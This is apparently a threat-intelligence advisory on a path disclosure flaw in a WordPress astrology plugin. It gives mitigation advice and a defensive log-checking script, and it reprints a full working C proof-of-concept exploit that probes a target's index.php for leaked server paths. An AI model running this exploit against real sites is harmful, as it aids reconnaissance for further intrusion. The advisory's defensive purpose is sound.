Birth Chart Compatibility WordPress Plugin 2.0 - Full Path Disclosure
AI Analysis
Technical Summary
The Birth Chart Compatibility WordPress Plugin version 2.0 contains a full path disclosure vulnerability that exposes the absolute file system path of the web server to unauthenticated attackers. This type of vulnerability typically arises from improper error handling or debug information leakage, where the plugin outputs or reveals the full server path in error messages or responses. Attackers can leverage this information to map the server's directory structure, identify the location of critical files, and facilitate further attacks such as local file inclusion (LFI), remote code execution (RCE), or privilege escalation. The exploit code available on Exploit-DB is written in C, suggesting that the exploit can be compiled and run on various platforms to automate the attack process. Although no active exploitation has been reported, the availability of exploit code lowers the barrier for attackers. The vulnerability affects WordPress sites using this specific plugin version, which may be installed on numerous websites globally. Since the vulnerability does not require authentication or user interaction, it can be exploited remotely by any attacker scanning for vulnerable sites. The lack of patch links indicates that no official fix has been released yet, emphasizing the need for immediate mitigation steps by site administrators.
Potential Impact
For European organizations, this vulnerability can lead to the exposure of sensitive server path information, which can be leveraged by attackers to conduct more targeted and effective attacks against web infrastructure. While the vulnerability itself does not directly compromise confidentiality or availability, it significantly aids attackers in reconnaissance and subsequent exploitation attempts. Organizations handling sensitive data or critical services via WordPress sites are at increased risk, as attackers may use the disclosed information to identify and exploit other vulnerabilities. This can lead to data breaches, defacement, or service disruptions. The impact is particularly relevant for sectors with high online presence such as e-commerce, media, and public services. Additionally, organizations in Europe must consider compliance with GDPR, as any resulting data breach from chained exploits could lead to regulatory penalties.
Mitigation Recommendations
European organizations should immediately audit their WordPress installations to identify the presence of the Birth Chart Compatibility Plugin version 2.0. If found, they should remove or disable the plugin until a patch is available. Restricting access to error messages and sensitive files via web server configuration (e.g., disabling detailed error reporting in production environments) can reduce information leakage. Implementing Web Application Firewalls (WAFs) with rules to detect and block attempts to exploit path disclosure vulnerabilities can provide an additional layer of defense. Regularly monitoring web server logs for unusual requests or error patterns can help detect exploitation attempts early. Organizations should also ensure that WordPress core and all plugins are kept up to date and consider using security plugins that limit information disclosure. Finally, conducting security awareness training for web administrators about the risks of verbose error messages and insecure plugin usage is recommended.
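The log-monitoring and error-suppression steps above can be checked with a short script. This is an added example, not part of the original page or of the plugin: it assumes Combined Log Format access logs, the function names are hypothetical, and the sample log lines and response body are constructed.

```python
import re
from collections import Counter
from urllib.parse import unquote

# Plugin directory requested by the PoC quoted on this page.
PLUGIN_PREFIX = "/wp-content/plugins/birth-chart-compatibility/"

# Combined Log Format (assumed): ip ident user [time] "METHOD path proto" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (?P<path>\S+)[^"]*" (?P<status>\d{3}) ')

# PHP error text ending in "in <absolute path>.php on line <n>" (plain or HTML form).
LEAK_RE = re.compile(
    r"(?:Warning|Fatal error|Notice|Parse error)\b.*?\bin\s+(?:<b>)?"
    r"(?P<path>(?:/|[A-Za-z]:\\)[^\s<>\"']+\.php)(?:</b>)?\s+on line\s+(?:<b>)?\d+",
    re.IGNORECASE | re.DOTALL)


def plugin_probes(log_lines):
    """Count direct requests for PHP files in the plugin directory, per (client IP, status)."""
    hits = Counter()
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not an access-log line in the expected format
        # Drop the query string, then undo percent-encoding, doubled slashes and case tricks.
        path = re.sub(r"/+", "/", unquote(m["path"].split("?", 1)[0])).lower()
        if path.startswith(PLUGIN_PREFIX) and path.endswith(".php"):
            hits[(m["ip"], m["status"])] += 1
    return hits


def leaked_paths(body):
    """Return the absolute filesystem paths exposed by PHP error text in a response body."""
    return sorted({m["path"] for m in LEAK_RE.finditer(body)})


# Constructed sample data (documentation address ranges; not real traffic or plugin output).
SAMPLE_LOG = [
    '203.0.113.7 - - [27/Aug/2025:01:20:11 +0000] "GET /wp-content/plugins/birth-chart-compatibility/index.php HTTP/1.1" 200 412 "-" "curl/8.5.0"',
    '203.0.113.7 - - [27/Aug/2025:01:20:12 +0000] "GET //wp-content/plugins/Birth-Chart-Compatibility/index.php?x=1 HTTP/1.1" 200 412 "-" "curl/8.5.0"',
    '198.51.100.23 - - [27/Aug/2025:01:21:40 +0000] "GET /wp-content/plugins/birth-chart-compatibility/assets/style.css HTTP/1.1" 200 1530 "-" "Mozilla/5.0"',
    '198.51.100.23 - - [27/Aug/2025:01:21:41 +0000] "GET /index.php HTTP/1.1" 200 8841 "-" "Mozilla/5.0"',
]
SAMPLE_BODY = ("<br />\n<b>Warning</b>:  Undefined variable $x in "
               "<b>/var/www/html/wp-content/plugins/birth-chart-compatibility/index.php</b>"
               " on line <b>12</b><br />")

if __name__ == "__main__":
    for (ip, status), n in plugin_probes(SAMPLE_LOG).items():
        print(f"{ip} requested plugin PHP files {n}x (HTTP {status})")
    print("leaked:", leaked_paths(SAMPLE_BODY))
```

A 2xx status next to a hit means the endpoint is still reachable; once the plugin is removed or errors are suppressed, `leaked_paths` should return an empty list for the same request.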
Affected Countries
Germany, United Kingdom, France, Italy, Spain, Netherlands, Poland, Sweden
Indicators of Compromise
- exploit-code:

    /*
     * Exploit Title : Birth Chart Compatibility WordPress Plugin 2.0 - Full Path Disclosure
     * Author : Byte Reaper
     * Telegram : @ByteReaper0
     * CVE : CVE-2025-6082
     * Software Link : https://frp.wordpress.org/plugins/birth-chart-compatibility/
     * Description : Proof‑of‑Concept exploits the Full Path Disclosure bug in the
     * “Birth Chart Compatibility” WordPress plugin (<=v2.0). It sends
     * an HTTP GET request to the plugin’s index.php endpoint, captures
     * the resulting PHP warning or fatal error, and parses the server’s
     * filesystem path (e.g. “/var/www/html/wp-content/plugins/…” or
     * “C:\\xampp\\htdocs\\…”). Revealing this path aids attackers in
     * chaining further LFI/RCE or reconnaissance attacks.
     */
    #include<stdio.h>
    #include"argparse.h"
    #include<string.h>
    #include <stdlib.h>
    #include <curl/curl.h>
    #include <unistd.h>

    #define FULL 2300

    const char *url = NULL;
    const char *cookies=NULL;
    int selecetCookie = 0;
    int verbose = 0;

    void exitSyscall()
    {
        __asm__ volatile
        (
            "xor %%rdi, %%rdi\n\t"
            "mov $0x3C, %%rax\n\t"
            "syscall\n\t"
            :
            :
            :"rax", "rdi"
        );
    }

    const char *keyFound[] =
    {
        "Warning:",
        "Fatal error:",
        "/var/www/",
        "C:\\xampp\\"
    };

    struct Mem
    {
        char *buffer;
        size_t len;
    };

    size_t write_cb(void *ptr, size_t size, size_t nmemb, void *userdata)
    {
        size_t total = size * nmemb;
        struct Mem *m = (struct Mem *)userdata;
        char *tmp = realloc(m->buffer, m->len + total + 1);
        if (tmp == NULL)
        {
            printf("\e[1;31m[-] Failed to allocate memory!\e[0m\n");
            exitSyscall();
        }
        m->buffer = tmp;
        memcpy(&(m->buffer[m->len]), ptr, total);
        m->len += total;
        m->buffer[m->len] = '\0';
        return total;
    }

    void showPath(const char *targetUrl)
    {
        char full[FULL];
        CURLcode curlCode;
        struct Mem response = {NULL, 0};
        CURL *curl = curl_easy_init();
        if (curl == NULL)
        {
            exitSyscall();
        }
        response.buffer = NULL;
        response.len = 0;
        if (verbose)
        {
            printf("==========================================\e[0m\n");
            printf("[+] Cleaning Response...\e[0m\n");
            printf("[+] Response Buffer : %s\e[0m\n", response.buffer);
            printf("[+] Response Len : %zu\e[0m\n", response.len);
            printf("==========================================\e[0m\n");
        }
        fflush(stdout);
        if (curl)
        {
            snprintf(full, sizeof(full), "%s/wp-content/plugins/birth-chart-compatibility/index.php", targetUrl);
            curl_easy_setopt(curl, CURLOPT_URL, full);
            if (selecetCookie)
            {
                curl_easy_setopt(curl, CURLOPT_COOKIEFILE, cookies);
                curl_easy_setopt(curl, CURLOPT_COOKIEJAR, cookies);
            }
            curl_easy_setopt(curl, CURLOPT_ACCEPT_ENCODING, "");
            curl_easy_setopt(curl, CURLOPT_FOLLOWLOCATION, 1L);
            sleep(1);
            curl_easy_setopt(curl, CURLOPT_WRITEFUNCTION, write_cb);
            curl_easy_setopt(curl, CURLOPT_WRITEDATA, &response);
            curl_easy_setopt(curl, CURLOPT_CONNECTTIMEOUT, 5L);
            curl_easy_setopt(curl, CURLOPT_TIMEOUT, 10L);
            curl_easy_setopt(curl, CURLOPT_SSL_VERIFYPEER, 0L);
            curl_easy_setopt(curl, CURLOPT_SSL_VERIFYHOST, 0L);
            if (verbose)
            {
                printf("\e[1;35m------------------------------------------[Verbose Curl]------------------------------------------\e[0m\n");
                curl_easy_setopt(curl, CURLOPT_VERBOSE, 1L);
            }
            struct curl_slist *h = NULL;
            h = curl_slist_append(h, "Accept: text/html");
            h = curl_slist_append(h, "Accept-Encoding: gzip");
            h = curl_slist_append(h, "Accept-Language: en-US,en");
            h = curl_slist_append(h, "Connection: keep-alive");
            h = curl_slist_append(h, "Referer: http://example.com");
            curl_easy_setopt(curl, CURLOPT_HTTPHEADER, h);
            long httpCode = 0;
            curlCode = curl_easy_perform(curl);
            if (curlCode == CURLE_OK)
            {
                printf("---------------------------------------------------------------------------------------\n");
                printf("\e[1;36m[+] Request sent successfully\e[0m\n");
                printf("\e[1;33m[+] Input Url : %s\e[0m\n", targetUrl);
                printf("\e[1;33m[+] Full Format Url : %s\e[0m\n",full);
                curl_easy_getinfo(curl, CURLINFO_RESPONSE_CODE, &httpCode);
                int numberKey = sizeof(keyFound) / sizeof(keyFound[0]);
                if (httpCode >= 200 && httpCode < 300)
                {
                    printf("[+] Http Code (200 < 300) !\e[0m\n");
                    printf("\e[1;32m[+] Http Code : %ld\e[0m\n", httpCode);
                    printf("\e[1;35m====================================[Response]====================================\e[0m\n");
                    printf("%s\n", response.buffer);
                    printf("\e[1;32m[+] Response Len : %zu\e[0m\n", response.len);
                    printf("\e[1;35m===================================================================================\e[0m\n\n");
                    for (int k = 0; k < numberKey; k++)
                    {
                        const char *found = strstr(response.buffer, keyFound[k]);
                        if (found)
                        {
                            printf("\e[1;34m[+] Keyword found: %s\e[0m\n", keyFound[k]);
                            printf("\e[1;34m[+] Context: %.100s\e[0m\n", found);
                        }
                    }
                }
                else
                {
                    printf("\e[1;31m[-] Http Code : %ld\e[0m\n", httpCode);
                    printf("\e[1;31m[-] Please Check Your input Path !\e[0m\n");
                    printf("\e[1;31m[-] Or Connection in Tragte : (%s)\e[0m\n", targetUrl);
                    if (verbose)
                    {
                        printf("\e[1;35m====================================[Response]====================================\n");
                        printf("%s\n", response.buffer);
                        printf("\e[1;32m[+] Response Len : %zu\e[0m\n", response.len);
                        printf("\e[1;35m===================================================================================\n\n");
                    }
                }
            }
            else
            {
                printf("\e[1;31m[-] The request was not sent !\e[0m\n");
                if (verbose)
                {
                    printf("\e[1;31m[-] Exit Syscall ...\e[0m\n");
                }
                printf("\e[1;31m[-] Error : %s\n", curl_easy_strerror(curlCode));
                exitSyscall();
            }
        }
        if (response.buffer)
        {
            free(response.buffer);
            response.buffer = NULL;
            response.len = 0;
        }
        curl_easy_cleanup(curl);
    }

    int main(int argc, const char **argv)
    {
        printf
        (
            "\e[1;91m"
            "▄▖▖▖▄▖ ▄▖▄▖▄▖▄▖ ▄▖▄▖▄▖▄▖ \n"
            "▌ ▌▌▙▖▄▖▄▌▛▌▄▌▙▖▄▖▙▖▛▌▙▌▄▌ \n"
            "▙▖▚▘▙▖ ▙▖█▌▙▖▄▌ ▙▌█▌▙▌▙▖ \n"
            "\e[1;97m\t Byte Reaper\e[0m\n"
        );
        printf("\e[1;91m---------------------------------------------------------------------------------------\e[0m\n");
        int loop = 0;
        struct argparse_option options[] =
        {
            OPT_HELP(),
            OPT_STRING('u', "url", &url, "Target Url (Base Url)"),
            OPT_STRING('c', "cookies", &cookies, "cookies File"),
            OPT_BOOLEAN('v', "verbose", &verbose, "Verbose Mode"),
            OPT_INTEGER('f', "loop", &loop, "For loop (Request) (Ex : -f 10)"),
            OPT_END(),
        };
        struct argparse argparse;
        argparse_init(&argparse, options, NULL, 0);
        argparse_parse(&argparse, argc, argv);
        if (!url)
        {
            printf("\e[1;31m[-] Please Enter Target Url !\e[0m\n");
            printf("\e[1;31m[-] Ex : ./exploit -u https://target.com\e[0m\n");
            exitSyscall();
        }
        if (verbose)
        {
            verbose=1;
        }
        if (cookies)
        {
            selecetCookie = 1;
        }
        if (loop)
        {
            for (int o = 0; o < loop ; o++)
            {
                showPath(url);
            }
        }
        showPath(url);
        return 0;
    }
Technical Details
- Edb Id: 52419
- Has Exploit Code: true
- Code Language: c
Threat ID: 68ae5e7aad5a09ad005d88ca
Added to database: 8/27/2025, 1:25:14 AM
Last enriched: 11/18/2025, 9:19:13 AM
Last updated: 12/4/2025, 3:34:01 AM